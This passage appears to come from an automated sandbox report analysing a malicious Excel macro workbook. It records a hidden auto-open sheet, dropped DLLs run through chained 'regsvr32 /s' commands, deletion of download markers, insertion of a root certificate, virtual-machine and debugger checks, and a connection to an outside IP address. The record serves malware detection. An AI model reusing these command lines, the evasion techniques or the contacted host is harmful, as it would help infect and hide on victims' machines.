windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="8" r:id="rId2"/><sheet name="Lefasbor1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Je1" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Je2" sheetId="6" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">#REF!</definedName><definedName name="DDWD1">#REF!</definedName><definedName name="DDWD2">#REF!</definedName><definedName name="DDWD3">#REF!</definedName><definedName name="DDWD4">#REF!</definedName><definedName name="GFGH1">EFALGV!$D$10</definedName><definedName name="GFGH2">EFALGV!$D$12</definedName><definedName name="GFGH3">EFALGV!$D$14</definedName><definedName name="GFGH4">EFALGV!$D$16</definedName><definedName name="GFGH5">EFALGV!$D$18</definedName><definedName name="GFGH6">EFALGV!$D$20</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFALGV!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1004EC35 appears 31 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001E302 appears 58 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1004764D appears 247 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10009F4E appears 32 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 100491EC appears 83 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10047680 appears 48 times
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$commenti_19265309.xlsmJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@27/5@1/41
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10007DD4 LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,3_2_10007DD4
                        Source: regsvr32.exe, 0000000D.00000002.511010476.0000000000403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM;.EXE;.BAT;.CMD;.VBp
                        Source: commenti_19265309.xlsmReversingLabs: Detection: 51%
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocxJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc"
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE639.tmpJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003B247 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,3_2_1003B247
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/media/image1.png
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
                        Source: commenti_19265309.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10049231 push ecx; ret 3_2_10049244
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10047725 push ecx; ret 3_2_10047738
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10059DC8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,3_2_10059DC8
                        Source: Lg1r0mo1[1].dll.0.drStatic PE information: section name: .didat
                        Source: sei.ocx.0.drStatic PE information: section name: .didat
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sei.ocxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sei.ocxJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the user root directory
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sei.ocxJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc:Zone.Identifier read attributes | delete
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc:Zone.Identifier read attributes | delete
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100014C4 IsIconic,3_2_100014C4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100111D8 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100111D8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002870B __EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,3_2_1002870B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100369AF IsWindowVisible,IsIconic,3_2_100369AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10006B1C IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_10006B1C
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2028Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 760Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2796Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2952Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2912Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2428Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2984Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1212Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1412Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 944Thread sleep time: -180000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1940Thread sleep time: -180000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1268Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 1.3 %
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-49888
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-49644
                        Source: regsvr32.exe, 0000000B.00000002.497300718.0000000000363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: regsvr32.exe, 0000000D.00000002.511010476.0000000000403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004802B VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_1004802B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002992A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002992A
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10059DC8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,3_2_10059DC8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029AA52 mov eax, dword ptr fs:[00000030h]4_2_0029AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099AA52 mov eax, dword ptr fs:[00000030h]5_2_0099AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0058AA52 mov eax, dword ptr fs:[00000030h]6_2_0058AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_001DAA52 mov eax, dword ptr fs:[00000030h]8_2_001DAA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_0048AA52 mov eax, dword ptr fs:[00000030h]9_2_0048AA52
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004763E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1004763E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048B58 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,3_2_10048B58
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004763E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1004763E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10059655 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10059655
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100500F4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_100500F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10056C81 SetUnhandledExceptionFilter,__encode_pointer,3_2_10056C81
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10056CA3 __decode_pointer,SetUnhandledExceptionFilter,3_2_10056CA3

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 168.119.39.118 187
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak"Jump to behavior
